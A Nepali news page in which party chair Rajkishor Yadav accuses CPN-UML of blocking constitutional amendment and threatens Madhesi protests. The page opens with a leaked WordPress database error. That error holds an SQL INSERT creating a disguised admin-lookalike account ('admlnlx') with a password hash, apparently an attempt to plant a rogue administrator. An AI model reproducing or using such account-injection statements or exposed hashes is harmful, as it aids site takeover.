WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrGxa93q/G19IOrWjk5PcHjlUjUT6.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:30:55', '', 'admlnlx', 'admlnlx')
सप्तरी, पुस १२–
मधेसी जनअधिकार फोरम (गणतान्त्रिक) का अध्यक्ष राजकिशोर यादवले संविधान संशोधन प्रक्रिया अवरुद्ध गरेर एमालेले देशमा ठूलो सङ्कट ल्याउन खोजेको आरोप लगाउनुभएको छ ।
सो पार्टीका सप्तरी शाखाले आज यहाँ आयोजना गरेको पत्रकार सम्मेलनमा उहाँले भन्नुभयो – ‘संविधान संशोधनका विषयमा संसद अवरुद्ध गरिरहनु एमालेको गैरराजनीतिक चरित्र हो ।’
अध्यक्ष यादवले थप्नुभयो “यथास्थितिमा हामी संविधान स्वीकार गर्न नसक्ने र एमालेले परिवर्तन स्वीकार गर्न नसक्ने भएपछि मुलुक थप जटिलतातर्फ उन्मुख हुँदै गएको छ,” भन्दै एमालेको हठका कारण लामो समयसम्म संविधान संशोधन अवरुद्ध भए यसले मुलुकलाई आरजकतातर्फ डोर्याउँछ बताउनुभयो ।
नेकपा (एमाले) जनभावनाविपरीत यथास्थिति र पश्चगमनको बाटोमा लागेको आरोप लगाउदै उहाँले पछिल्लो गतिविधिले एमालेले घोर दक्षिणपन्थीहरुको नेतृत्व गरिरहेको स्पष्ट हुन्छ भन्नुभयो ।
अध्यक्ष यादवले आदिवासी जनजाति, मधेसी, दलितलगायतका सिमान्तकृत समुदायको माग अब पनि सम्वोद्धन नभए मधेसी मोर्चा आन्दोलनमा जाने र आन्दोलनबाट नै अधिकार सुनिश्चितताको बाटो खोजिने स्पष्ट पार्नुभयो ।